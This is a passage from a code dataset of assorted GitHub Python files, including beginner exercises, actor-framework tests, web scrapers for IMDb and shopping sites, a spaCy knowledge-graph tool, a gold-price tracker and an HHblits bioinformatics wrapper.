and newlines) as\n# the delimiter and splits the string accordingly.\n\n# Converting elements to integers\nuser_list = [int(element) for element in user_list]\nlength = len(user_list)\nmul = 1\nfor i in range(0,length):\n    mul = mul * user_list[i]\n\nprint(\"The result of multiplying all the elements are : \"+str(mul))\n\n","repo_name":"Rimo2/Python_Promod_Sir_Class","sub_path":"27_OCT_2023/ListMultiply.py","file_name":"ListMultiply.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} {"seq_id":"11335228558","text":"array = {'platano', 'melon', 'sandia'}\n\narray.add(\"kiwi\")\narray.remove(\"melon\")\n\n\nfor fruta in array:\n    print(\"Las frutas son: \" + fruta) \n\narray.clear()\nprint(\"Ahora ya no hay frutas\")\n\n# MORE EXAMPLES\n\n#1\ndiccionario = {\n    \"Programar\": \"Programar es transformar el cafe en codigo\",\n    \"POO\": \"Programación orientada a objetos\",\n    \"MVC\": \"Modelo Vista Controlador\"\n}\n\nprint(diccionario[\"POO\"])\n\n#2\nnumeros = {\n    \"0\": \"Cero\",\n    \"1\": \"Uno\",\n    \"2\": \"Dos\"\n}\n\ntexto = input(\"Ingrese un numero: \")\n\ntextoFinal = \"\"\nfor letra in texto:\n    textoFinal += numeros[letra]\n\nprint(textoFinal) ","repo_name":"JoelGarciaValhondo/Python","sub_path":"7-Array.py","file_name":"7-Array.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} {"seq_id":"28273515569","text":"## Assignment 2: a grid-drawing program, 
drawing a grid of cell size 100 from 0,0 to 500,500\n# use a loop such as for or while\n# a cell size of 100 means each side is split into 5, so six vertical and six horizontal lines are needed?\n# because of screen-size limits I changed it to draw a grid from 0,0 to 300,300 with cell size 60,\n# my apologies!\n\nimport turtle # first, import the turtle module\n\nturtle.speed(0) # fastest drawing speed\nstart_x = 0 # starting coordinates\nstart_y = 0\n\ndef turtle_move(a,b): # helper that moves the turtle without drawing\n    turtle.penup()\n    turtle.goto(a,b)\n    turtle.pendown()\n\nfor i in range(6): # draw the vertical lines first, moving horizontally (along the x axis)\n    turtle.goto(start_x,start_y-300)\n    start_x = start_x + 60 \n    turtle_move(start_x, start_y)\n\nstart_x = 0 # reset the starting coordinates\nstart_y = 0\nturtle_move(0,0)\n\nfor i in range(6): # finally, the horizontal lines!\n    turtle.goto(start_x+300,start_y)\n    start_y = start_y - 60 \n    turtle_move(start_x, start_y)\n\n\n\nturtle.exitonclick()\n \n","repo_name":"duck9827/Term","sub_path":"수업내용/py_01_03_2017184017_2.py","file_name":"py_01_03_2017184017_2.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} {"seq_id":"28379324185","text":"import pytest\n\nfrom protoactor.actor.event_stream import EventStream\nfrom protoactor.mailbox.dispatcher import Dispatchers\n\n@pytest.mark.asyncio\nasync def test_can_subscribe_to_specific_event_types():\n    received_events = []\n\n    async def fun(msg):\n        received_events.append(msg)\n\n    event_stream = EventStream()\n    event_stream.subscribe(fun, str)\n    await event_stream.publish('hello')\n\n    assert received_events[0] == 'hello'\n\n@pytest.mark.asyncio\nasync def test_can_subscribe_to_all_event_types():\n    received_events = []\n\n    async def fun(msg):\n        received_events.append(msg)\n\n    event_stream = EventStream()\n    event_stream.subscribe(fun)\n\n    await event_stream.publish('hello')\n
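    # a subscription registered without an event type receives every message\n    assert 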
received_events[0] == 'hello'\n\n await event_stream.publish(1)\n assert received_events[1] == 1\n\n await event_stream.publish(True)\n assert received_events[2] is True\n\n@pytest.mark.asyncio\nasync def test_can_unsubscribe_from_events():\n received_events = []\n\n async def fun(msg):\n received_events.append(msg)\n\n event_stream = EventStream()\n subscription = event_stream.subscribe(fun, str)\n await event_stream.publish('first message')\n subscription.unsubscribe()\n await event_stream.publish('second message')\n\n assert len(received_events) == 1\n\n@pytest.mark.asyncio\nasync def test_only_receive_subscribed_to_event_types():\n received_events = []\n\n async def fun(msg):\n received_events.append(msg)\n\n event_stream = EventStream()\n event_stream.subscribe(fun, int)\n await event_stream.publish('not an int')\n\n assert len(received_events) == 0\n\n@pytest.mark.asyncio\nasync def test_can_subscribe_to_specific_event_types_async():\n\n async def fun(msg):\n received = msg\n assert received == 'hello'\n\n event_stream = EventStream()\n event_stream.subscribe(fun, str, Dispatchers().default_dispatcher)\n await event_stream.publish('hello')","repo_name":"asynkron/protoactor-python","sub_path":"tests/actor/test_event_stream.py","file_name":"test_event_stream.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"63"} +{"seq_id":"31865550578","text":"import logging\nimport random\nimport subprocess\nimport time\n\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport requests\n\n# install dependencies\nsubprocess.check_call(['pip', 'install', 'beautifulsoup4'])\nsubprocess.check_call(['pip', 'install', 'pandas'])\nsubprocess.check_call(['pip', 'install', 'requests'])\n\n# log format\nlogging.basicConfig(\n format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%H:%M:%S',\n level=logging.INFO)\n\n\ndef get_request_headers() -> dict:\n return {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/50.0.2661.102 Safari/537.36'}\n\n\ndef convert_runtime(time_str):\n if len(time_str) == 2:\n return f\"{60}\"\n if \"h\" not in time_str.lower():\n return time_str[: len(time_str) - 1]\n hours, minutes = time_str.split(\"h \")\n minutes = int(minutes[:-1])\n total_minutes = int(hours) * 60 + minutes\n return total_minutes\n\n\ndef run():\n logging.info('Script Start running ...')\n df = pd.read_csv('new.csv')\n ids = df['0']\n data = []\n for ind, each_id in enumerate(ids):\n try:\n url = f\"https://m.imdb.com/title/{each_id}/\"\n page = requests.post(url, headers=get_request_headers())\n if page.status_code == 200:\n soup = BeautifulSoup(page.content, \"html.parser\")\n title = soup.find('span', class_=\"sc-afe43def-1 fDTGTb\").text\n ul = soup.find('ul',\n class_='ipc-inline-list ipc-inline-list--show-dividers sc-afe43def-4 kdXikI baseAlt')\n lis = ul.findAll('li', class_=\"ipc-inline-list__item\")\n\n print(lis)\n\n if len(lis) == 4:\n data.append(\n [title.strip(), lis[0].text.strip(), convert_runtime(lis[3].text.strip()), lis[1].text.strip().replace('–', '-'),\n each_id])\n\n elif len(lis) == 2:\n if 'tv' in lis[0].text.strip().lower():\n data.append(\n [title.strip(), lis[0].text.strip(), convert_runtime(lis[1].text.strip()), 'N/A', each_id])\n else:\n data.append([title.strip(), 'N/A', convert_runtime(lis[1].text.strip()), lis[0].text.strip().replace('–', '-'), each_id])\n\n logging.info(f'--> data is extracted for id = {each_id}')\n\n 
except Exception as ex:\n print(ex)\n logging.error(f'--> failed to extract data from id = {each_id}')\n continue\n\n df = pd.DataFrame(data, columns=[\"Title\", \"MediaType\", \"RunTime\", \"Year\", \"ImdbID\"])\n df.to_csv(f\"data-{random.randint(1, 9999)}.csv\", index=False, encoding='utf8')\n logging.info('Script successfully completed!')\n\n\nrun()\n","repo_name":"saifarnab/web_scraping","sub_path":"imdb/imdb.py","file_name":"imdb.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"10033513350","text":"#!/usr/bin/python3\n\n'''\nAuthor: Ambareesh Ravi\nDate: 26 July, 2021\nFile: text_knowledge_graph.py\nDescription:\n Creates and visualizes a knowledge from textual data using Natural Language Processing.\n Has applications in medicine, finance, recommendation systems, fraud detection, trading etc.\n'''\n\n# Library imports\nimport argparse\nimport numpy as np\nimport pandas as pd\n\nimport spacy\nfrom spacy.matcher import Matcher\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nfrom tqdm import tqdm\n\n# Module imports\nfrom data import *\n\n# Global variables\n# Change to different language pack as required\nnlp = spacy.load('en_core_web_sm')\n\nclass TextKnowledgeGraph:\n # Creates and visualizes a knowledge graph from textual data\n def __init__(self, data):\n '''\n Initializes the class\n\n Args:\n data - the text data as \n Returns:\n -\n Exception:\n -\n '''\n self.data = data\n\n # define pattern matching params\n self.matcher = Matcher(nlp.vocab)\n pattern = [\n {'DEP':'ROOT'},\n {'DEP':'prep','OP':\"?\"},\n {'DEP':'agent','OP':\"?\"},\n {'POS':'ADJ','OP':\"?\"}\n ]\n self.matcher.add(\"matching_1\", None, pattern)\n\n # Build the knowledge graph\n self.build()\n\n def extract_entities(self, sentence):\n '''\n Extracts entities from a sentence using Spacy dependency parser\n\n Args:\n sentence - the input sentence as \n Returns:\n pair of entities as \n Exception:\n -\n '''\n\n entity1, entity2, prefix, modifier, prev_token_dep, prev_token_text = \"\", \"\", \"\", \"\", \"\", \"\"\n \n for token in nlp(sentence):\n # Skip punctuation\n if token.dep_ == \"punct\": continue\n \n # Check for compound sentence/ words\n if token.dep_ == \"compound\":\n prefix = token.text\n # Check for and add the previous compound words\n if prev_token_dep == \"compound\":\n prefix = \"%s %s\"%(prev_token_text, token.text)\n \n # Check if token is a modifier\n if token.dep_.endswith(\"mod\") == True:\n modifier = token.text\n # Check for and add the previous compound words\n if prev_token_dep == \"compound\":\n modifier = \"%s %s\"%(prev_token_text, token.text)\n \n # Check if the word/ token is the subject\n if token.dep_.find(\"subj\") == True:\n entity1 = \"%s %s %s\"%(modifier, prefix, token.text)\n prefix, modifier, prev_token_dep, prev_token_text = \"\", \"\", \"\", \"\"\n \n # Check if the word/ token is the object\n if token.dep_.find(\"obj\") == True:\n entity2 = \"%s %s %s\"%(modifier, prefix, token.text)\n \n # Update values\n prev_token_dep, prev_token_text = token.dep_, token.text\n \n # Return results\n return [entity1.strip(), entity2.strip()]\n\n\n def extract_relations(self, sentence):\n '''\n Extracts the relationships in the sentence\n\n Args:\n sentence - the input sentence as \n Returns:\n relationship as \n Exception:\n -\n '''\n\n doc = nlp(sentence)\n matches = self.matcher(doc)\n span = doc[matches[-1][1]:matches[-1][2]]\n return span.text\n\n def 
get_knowledge_graph_data(self, entity_pairs, relations):\n '''\n Creates and returns as dataframe for knowledge graph creation\n\n Args:\n entity_pairs - of all entity pairs in the dataset\n relations - of all relationships between the entity pairs in the dataset\n Returns:\n data as \n Exception:\n -\n '''\n\n ep_array = np.array(entity_pairs)\n # subject [source] -> object [target]\n kd_df = pd.DataFrame(\n {\n \"source\": ep_array[:,0],\n \"target\": ep_array[:,1],\n \"edge\": relations\n }\n )\n return kd_df\n\n def create_network(self, kd_df, key_relation = None):\n '''\n Creates directed graph from knowledge graph dataframe\n\n Args:\n kd_df - knowledge graph data as \n key_relation - a particular relationship to look for \n Returns:\n graph as \n Exception:\n -\n '''\n \n dir_graph = nx.from_pandas_edgelist(\n df = kd_df[kd_df['edge'] == key_relation] if key_relation else kd_df,\n source = 'source',\n target = 'target',\n edge_attr = True,\n create_using = nx.MultiDiGraph()\n )\n return dir_graph\n\n def plot_graph(self, dir_graph, figsize = (12,12), node_spacing = 0.5, node_size = 1000, node_color = 'skyblue'):\n '''\n Plots and displays the knowledge graph using matplotlib.pyplot\n\n Args:\n dir_graph - knowledge graph as \n figsize - size of the figure as a \n node_spacing - parameter to adjust the distance between nodes in the graph as \n node_size - maximum number of nodes as \n node_color - colour for the nodes as [correspondingly color map has to be changed]\n Returns:\n -\n Exception:\n -\n '''\n \n plt.figure(figsize = figsize)\n pos = nx.spring_layout(dir_graph, k = node_spacing)\n nx.draw(dir_graph, with_labels = True, node_color = node_color, node_size = node_size, edge_cmap = plt.cm.Blues, pos = pos)\n plt.show() \n\n def build(self,):\n '''\n Builds the knowledge graph internally and stores it in a dataframe\n\n Args:\n -\n Returns:\n -\n Exception:\n -\n '''\n entity_pairs = [self.extract_entities(sent) for sent in tqdm(self.data[\"sentence\"])]\n relations = [self.extract_relations(sent) for sent in tqdm(self.data['sentence'])]\n self.kd_df = self.get_knowledge_graph_data(entity_pairs, relations)\n\n def get_by_relationship(self, relationship):\n '''\n Dynamically generates and visualizes the part of the graph based on the relationship\n\n Args:\n relationship - key relationship to look for as \n Returns:\n -\n Exception:\n -\n '''\n dir_graph = self.create_network(self.kd_df, relationship)\n self.plot_graph(dir_graph)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--data_path\", type=str, default = \"data/wikipedia_sentences.csv\", help=\"Path to the data csv file\")\n parser.add_argument(\"--relationship\", type=str, default = None, help=\"A relationship between entities to be observed. 
If left empty, the tool will show EVERYTHING!\")\n    args = parser.parse_args()\n\n    # Load data\n    data = Dataset(args.data_path)\n    # Create an object for the knowledge graph\n    kg = TextKnowledgeGraph(data()) # data() is same as data.df\n\n    # Visualize based on the relationships\n    # kg.get_by_relationship(\"written by\")\n    # kg.get_by_relationship(\"directed by\")\n    # kg.get_by_relationship(\"includes\")\n    # kg.get_by_relationship(\"composed by\")\n\n    kg.get_by_relationship(args.relationship)","repo_name":"ambareeshravi/Knowledge_Graphs-Text","sub_path":"text_knowledge_graph.py","file_name":"text_knowledge_graph.py","file_ext":"py","file_size_in_byte":7622,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} {"seq_id":"72606147399","text":"\"\"\"\r\nin this version:\r\n- we use asyncio to execute the functions concurrently\r\n- we use aiohttp to make the requests to the websites\r\n- we use bs4 to parse the html content\r\n- we collect the gold prices from 4 websites\r\n- we get the average price in 3 decimal points and save it in a json file\r\n- we will plot the data in a graph using matplotlib\r\n- we will add get_silver_price() function to get the silver price from 2 websites\r\n\"\"\"\r\n\r\nfrom priceTrackerV8 import *\r\nimport asyncio\r\n\r\n\r\ndef get_stocks_dict():\r\n    # read the stocks dict from the stocks.json file\r\n    try:\r\n        with open('stocks.json', 'r') as f:\r\n            stocks = json.load(f)\r\n        return stocks\r\n    except FileNotFoundError:\r\n        print('stocks.json file not found')\r\n        return None\r\n\r\n\r\nasync def main():\r\n\r\n    # stocks = {\r\n    #     'Gold': {\r\n    #         'URLs':['https://pricegold.net/ar/kw-kuwait/',\r\n    #                 'https://ar.fkjewellers.com/pages/gold-price-in-kuwait',\r\n    #                 'https://wikigerman.net/gold-kw/',\r\n    #                 'https://www.livepriceofgold.com/'],\r\n    #\r\n    #         'get_price_function':'get_gold_price24_async'\r\n    #     },\r\n    #     'Silver': {\r\n    #         'URLs': ['https://www.livepriceofgold.com/silver-price/kuwait.html',\r\n    #                 'https://www.prokerala.com/finance/silver-price.php'],\r\n    #\r\n    #         'get_price_function': 'get_silver_price_async'\r\n    #     }\r\n    # }\r\n    #\r\n    # # save the stocks dict in a json file\r\n    # with open('stocks.json', 'w') as f:\r\n    #     json.dump(stocks, f, indent=4)\r\n\r\n    stocks = get_stocks_dict()\r\n    if not stocks:\r\n        return -1\r\n    # update the get price function for each stock by the actual function from the priceTrackerV8.py file\r\n    for stock_type, stock_data in stocks.items():\r\n        stock_data['get_price_function'] = eval(stock_data['get_price_function'])\r\n\r\n\r\n\r\n    stocks_prices = await get_all_stock_prices(stocks)\r\n\r\n    if stocks_prices:\r\n        for stock_type, stock_price in stocks_prices:\r\n            update_stock_price_json_file(stock_type, stock_price)\r\n\r\n    # plot_prices(stocks_prices)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n    # fix a known bug that raises an error on Windows\r\n    asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\r\n    asyncio.run(main())\r\n","repo_name":"kingbode/GoldPriceTracker","sub_path":"Backup/V8 Backup/goldPriceTrackerV8.0000_Asynch.py","file_name":"goldPriceTrackerV8.0000_Asynch.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} {"seq_id":"1142568386","text":"from collections import defaultdict\ninput_data = input()\n\ncourses_dict = defaultdict(list)\n\nwhile input_data != 'end':\n\tcourse, student = input_data.split(' : ')\n\tcourses_dict[course].append(student)\n\tinput_data 
= input()\n\nordered_courses = sorted(courses_dict.items(), key=lambda x: len(x[1]), reverse=True)\n\nfor course in ordered_courses:\n\tstudents = sorted(course[1])\n\tprint(f'{course[0]}: {len(students)}')\n\tfor student in students:\n\t\tprint(f'-- {student}')","repo_name":"hristo-grudev/SoftUni","sub_path":"Python Fundamentals/Dictionaries - Exercise/06. Courses.py","file_name":"06. Courses.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"8923280411","text":"# -*- coding: utf-8 -*-\n\"\"\"\npython-ftgl\n========\n\nUsage:\n\n import ftgl\n font = ftgl.FTGLPixmapFont(\"Arial.ttf\")\n font.FaceSize(72)\n font.Render(\"Hello World!\")\n\n\"\"\"\n\nimport os, sys\n\nfrom distutils.core import setup, Extension\nfrom distutils.command import build_ext\n\ninclude_dirs = [\"/usr/include\", \"/usr/include/freetype2\"]\nlibraries = [\"ftgl\", \"boost_python\"]\nlibrary_dirs = [\"/usr/lib\"]\nsources = []\nfor (root, dirs, files) in os.walk('src'):\n for name in files:\n if name.endswith(\".cpp\"):\n sources.append(\"{}/{}\".format(root,name))\n\next = Extension(name = \"ftgl.__ftgl\",\n include_dirs = include_dirs,\n libraries = libraries,\n library_dirs = library_dirs,\n sources = sources,\n extra_compile_args = [\"-std=c++11\"])\n\n# ccache\nfor path in os.environ[\"PATH\"].split(os.pathsep):\n path = path.strip('\"')\n exe = os.path.join(path, \"ccache\")\n if os.path.isfile(exe) and os.access(exe, os.X_OK):\n os.environ[\"CC\"] = \"ccache gcc\"\n break\n\nsetup(name = \"python-ftgl\",\n long_description = __doc__,\n version = \"0.1.0\",\n description = \"python-ftgl: Python FTGL binding\",\n author = \"mugwort_rc\",\n author_email = \"mugwort rc at gmail com\",\n url = \"https://github.com/mugwort-rc/python-ftgl\",\n classifiers = [\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: C++\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.7\",\n ],\n license = \"MIT License\",\n packages = [\"ftgl\"],\n\n ext_modules = [ext])\n\n","repo_name":"mugwort-rc/python-ftgl","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"36183931476","text":"import requests\nimport time\nfrom bs4 import BeautifulSoup\nfrom django.shortcuts import render\nfrom .models import Search\nfrom requests.compat import quote_plus\nfrom . 
import models\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\nBASE_AMAZON_URL='https://www.amazon.in/s?k={}'\nBASE_FLIPKART_URL='https://www.flipkart.com/search?q={}'\nBASE_SNAPDEAL_URL='https://www.snapdeal.com/search?keyword={}'\n\n# Create your views here.\ndef home(request):\n    stuff_for_frontend={\n        'title': \"Home\",\n    }\n    return render(request,'scrape/home.html',stuff_for_frontend)\n\ndef new_search(request):\n    search=request.POST.get('search')\n    models.Search.objects.create(search=search)\n\n    #AMAZON STUFF HERE\n    final_amazon_url=BASE_AMAZON_URL.format(quote_plus(search))\n    response=requests.get(final_amazon_url)\n    data=response.content\n    soup=BeautifulSoup(data,features='html.parser')\n    name,amazon_ratings,amazon_name,amazon_img,amazon_price,amazon_link=[],[],[],[],[],[]\n    amazon_postings=[]\n    #count_ratings=0\n    for dataId in soup.findAll(has_data_asin):\n        name=dataId.findChildren('span', {\"class\": \"a-size-medium a-color-base a-text-normal\"})\n        if name==[]:\n            name=dataId.findChildren('span', {\"class\": \"a-size-base-plus a-color-base a-text-normal\"})\n        rating_ama = dataId.findChildren('span', {\"class\": \"a-icon-alt\"})\n        for r2 in rating_ama:\n            rt = r2.text\n            x = rt.split(' ')\n            print(r2)\n            if (len(amazon_ratings))<3:\n            \n                print(amazon_ratings)\n                if r2==[]:\n                    amazon_ratings.append(-1)\n                else:\n                    amazon_ratings.append(float(x[0]))\n            x.clear()\n        flag = True\n\n        content = []\n        for item1 in name:\n            item1 = [content for content in item1.text.split('\\n') if len(content) > 0]\n            item1 = ' '.join(item1)\n            content.append(item1)\n        for i in content:\n            if search.lower() in i.lower():\n                if len(amazon_name)<3:\n                    amazon_name.append(i)\n            else:\n                flag = False\n        price_flag = False\n        \n        image = dataId.findChildren('img', { \"class\" : \"s-image\" })\n        #print(image[0]['src'])\n        if len(amazon_img)<3:\n            amazon_img.append(image[0]['src'])\n        \n        rating2 = dataId.findChildren('span', {\"class\": \"a-size-medium a-color-base a-text-beside-button a-text-bold\"})\n        #print(rating2)\n        price = dataId.findChildren('span', {\"class\": \"a-color-price\"})\n        if(price == []):\n            price = dataId.findChildren('span', {\"class\": \"a-price-whole\"})\n            price_flag = True\n        #print(price)\n        content1 = []\n        if price == [] and len(amazon_price)<3:\n            amazon_price.append('NA')\n        else:\n            for item2 in price:\n                item2 = [content1 for content1 in item2.text.split('\\n') if len(content1) > 0]\n                item2 = ' '.join(item2)\n                content1.append(item2)\n            for i in content1:\n                if flag:\n                    if len(amazon_price)<3:\n                        amazon_price.append(i)\n\n        links_with_text = []\n        for a in dataId.findChildren('a', {\"class\": \"a-link-normal a-text-normal\"}, href=True):\n            if a.text:\n                links_with_text.append(a['href'])\n        if links_with_text==[]:\n            for a in dataId.findChildren('a', {\"class\": \"a-link-normal a-text-normal\"}, href=True):\n                if a.text:\n                    links_with_text.append(a['href'])\n        for t in links_with_text:\n            if flag:\n                #print(\"https://www.amazon.in\"+t)\n                if len(amazon_link)<3:\n                    amazon_link.append(\"https://www.amazon.in\"+t)\n        \n        if len(amazon_link)==3:\n            break\n\n    m=len(amazon_name)\n    n=len(amazon_ratings)\n    if n<m:\n        while len(amazon_ratings)!=len(amazon_name):\n            amazon_ratings.append(-1)\n    if len(amazon_name)>0: \n        #print(amazon_name,len(amazon_price),len(amazon_name),len(amazon_ratings)) \n        for i in range(len(amazon_name)):\n            print(i)\n            amazon_postings.append((amazon_name[i],amazon_link[i],amazon_price[i],amazon_img[i],amazon_ratings[i]))\n    \n    print(\"AMAZON:\\n\",amazon_img,'\\n',amazon_price,'\\n',amazon_name,'\\n',amazon_link,'\\n',amazon_ratings)\n    \n\n    # FLIPKART STUFF HERE\n    \n    
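# build the Flipkart search URL for the query and download the results page\n    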
final_flipkart_url=BASE_FLIPKART_URL.format(quote_plus(search))\n response=requests.get(final_flipkart_url)\n data=response.content\n soup=BeautifulSoup(data,features='html.parser')\n flipkart_price,flipkart_link,flipkart_name,flipkart_rating,flipkart_img=[],[],[],[],[]\n temp,count=0,0\n\n options = Options()\n driver = webdriver.Chrome(r'D:\\Downloads\\chromedriver.exe', options=options)\n driver.get(final_flipkart_url)\n driver.implicitly_wait(2)\n src=[]\n image = driver.find_elements_by_tag_name('img')\n for i in image:\n src.append(i.get_attribute('src'))\n for a in src:\n if 'q=70' in a:\n if len(flipkart_img)<3:\n flipkart_img.append(a)\n driver.close()\n\n for dataId in soup.findAll(has_id_no_class):\n name = dataId.findChildren('div', {\"class\": \"_3wU53n\"})\n if name == []:\n name = dataId.findChildren('a', {\"class\": \"_2cLu-l\"})\n temp += 1\n else:\n temp = 0 \n name2 = name.copy()\n image = dataId.findChildren('img')\n #print(image)\n rating = dataId.findChildren('div', {\"class\": \"hGSR34\"})\n for r in rating:\n if len(flipkart_rating)<3:\n flipkart_rating.append(float(r.text))\n flag = True\n content = []\n for item1 in name:\n item1 = [content for content in item1.text.split('\\n') if len(content) > 0]\n item1 = ' '.join(item1)\n content.append(item1)\n for i in content:\n if search.lower() in i.lower():\n if len(flipkart_name)<3:\n flipkart_name.append(i)\n else:\n flag = False\n\n while len(flipkart_rating)!=len(flipkart_name):\n flipkart_rating.append(-1)\n\n \n price = dataId.findChildren('div', {\"class\": \"_1vC4OE _2rQ-NK\"})\n if price == []:\n price = dataId.findChildren('div', {\"class\": \"_1vC4OE\"})\n content1 = []\n for item2 in price:\n item2 = [content1 for content1 in item2.text.split('\\n') if len(content1) > 0]\n item2 = ' '.join(item2)\n content1.append(item2)\n for i in content1:\n if flag:\n if len(flipkart_price)<3:\n flipkart_price.append(i)\n\n links_with_text = []\n if temp == 0:\n for a in dataId.findChildren('a', {\"class\": \"_31qSD5\"}, href=True):\n if a.text:\n links_with_text.append(a['href'])\n for t in links_with_text:\n if flag:\n if len(flipkart_link)<3:\n flipkart_link.append(\"https://www.flipkart.com\"+t)\n elif temp>0:\n for i in name2:\n links_with_text.append(i['href'])\n for t in links_with_text:\n if flag:\n if len(flipkart_link)<3:\n flipkart_link.append(\"https://www.flipkart.com\"+t)\n\n print(len(flipkart_price),len(flipkart_link),len(flipkart_name),len(flipkart_rating),len(flipkart_img))\n print(\"FLIPKART\\n\",flipkart_price,'\\n',flipkart_link,'\\n',flipkart_name,'\\n',flipkart_rating,'\\n',flipkart_img)\n flipkart_postings=[]\n if len(flipkart_name)>0:\n for i in range(len(flipkart_name)):\n # print(i)\n flipkart_postings.append((flipkart_name[i],flipkart_link[i],flipkart_price[i],flipkart_img[i],flipkart_rating[i]))\n\n\n\n\n\n\n\n #SNAPDEAL STUFF HERE\n final_SD_url=BASE_SNAPDEAL_URL.format(quote_plus(search))\n response=requests.get(final_SD_url)\n data=response.content\n soup=BeautifulSoup(data,features='html.parser')\n SD_price,SD_link,SD_name,SD_rating,SD_img=[],[],[],[],[]\n image = soup.findChildren('img', { \"class\" : \"product-image\" })\n price = soup.findChildren('span', { \"class\" : \"lfloat product-price\" })\n name = soup.findChildren('p', { \"class\" : \"product-title\" })\n link = soup.findChildren('a', { \"class\" : \"dp-widget-link noUdLine\" }, href = True)\n #print(price)\n for i in image:\n if len(SD_img)<3:\n if i==[]:\n SD_img.append('NA')\n else:\n SD_img.append(i['src'])\n for j in 
price:\n if len(SD_price)<3:\n if j==[]:\n SD_price.append('Price Unavailable')\n else:\n SD_price.append(j.text)\n for n in name:\n if len(SD_name)<3:\n if n==[]:\n SD_name.append('Name not available')\n else:\n SD_name.append(n.text)\n for l in link:\n if len(SD_link)<3:\n if l==[]:\n SD_link.append('#')\n else:\n SD_link.append(l['href'])\n # print()\n # print()\n print(\"SD:\\n\",SD_img,'\\n',SD_price,'\\n',SD_name,'\\n',SD_link)\n SD_postings=[]\n if len(SD_name)>0:\n for i in range(len(SD_name)):\n # print(i)\n SD_postings.append((SD_name[i],SD_link[i],SD_price[i],SD_img[i]))\n \n\n stuff_for_frontend={\n 'title': search.capitalize(),\n 'search':search,\n 'amazon_postings':amazon_postings,\n 'flipkart_postings': flipkart_postings,\n 'SD_postings': SD_postings,\n }\n return render(request, 'scrape/new_search.html',stuff_for_frontend)\n\n\n\ndef has_data_asin(tag): #for amazon\n return tag.has_attr('data-asin')\n\ndef has_id_no_class(tag): #for flipkart\n return tag.has_attr('data-id') and not tag.has_attr('class')","repo_name":"kamathprasad9/django-web-scrapper","sub_path":"django_project/scrape/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29965913091","text":"\"\"\"\nHHSuite wrappers.\n\n\"\"\"\n\nimport os\nimport json\nimport gzip\nimport shutil\nimport multiprocessing\n\nimport tqdm\n\n\ndef run_pdblist(pdblist, db, n_threads=None, hh_iters='2', use_msa=False, mact=0.35):\n if n_threads is None:\n n_threads = multiprocessing.cpu_count() // 2\n \n pool = multiprocessing.Pool(n_threads)\n promises = {}\n\n for molid, dat in sorted(pdblist.items()):\n seq = ''.join(r['restype'] for r in dat)\n promises[molid] = pool.apply_async(hhblits, (molid, seq, db, hh_iters), {'use_msa': use_msa, 'mact': mact}), seq\n\n longest_seq = 0\n profiles_out = {}\n\n desc = 'Running HHBlits'\n for molid, (promise, seq) in tqdm.tqdm(sorted(promises.items()), ncols=80,\n desc=desc, leave=True, smoothing=0):\n try:\n hhout = promise.get()\n except Exception:\n raise Exception('Error:' + molid)\n\n if hhout['seq'] != seq:\n # print(molid.upper() + '.*')\n raise Exception('Error:' + molid)\n\n profiles_out[molid] = hhout\n\n return profiles_out\n\n\ndef freq(freqstr):\n if freqstr == '*':\n return 0.\n p = 2**(int(freqstr) / -1000)\n assert 0 <= p <= 1.0\n return p\n\n\ndef parse_hhm(hhmfp):\n neff = None\n for line in hhmfp:\n if line[0:4] == 'NEFF' and neff is None:\n neff = float(line[4:].strip())\n if line[0:8] == 'HMM A':\n header1 = line[7:].strip().split('\\t')\n break\n\n header2 = next(hhmfp).strip().split('\\t')\n next(hhmfp)\n\n seq = []\n profile = []\n for line in hhmfp:\n if line[:2] == '//':\n break\n aa = line[0]\n seq.append(aa)\n\n freqs = line[7:].split('\\t')[:20]\n features = {h: freq(i) for h, i in zip(header1, freqs)}\n assert len(freqs) == 20\n\n mid = next(hhmfp)[7:].strip().split('\\t')\n\n features.update({h: freq(i) for h, i in zip(header2, mid)})\n\n profile.append(features)\n next(hhmfp)\n\n return {\n 'seq': ''.join(seq),\n 'profile': profile,\n 'neff': neff,\n 'header': header1 + header2,\n }\n\n\ndef hhblits(molid, seq, db, hh_iters='2', cachedir='/data/Cache/NetSurfP-2.0/hhblits', use_msa=False, mact='0.35'):\n\n mact = '{:.2f}'.format(float(mact))\n\n db_short = os.path.split(db)[-1]\n cachedir = os.path.join(cachedir, db_short, 'N{}M{}'.format(hh_iters, mact))\n if not os.path.isdir(cachedir):\n try:\n os.mkdir(cachedir)\n except 
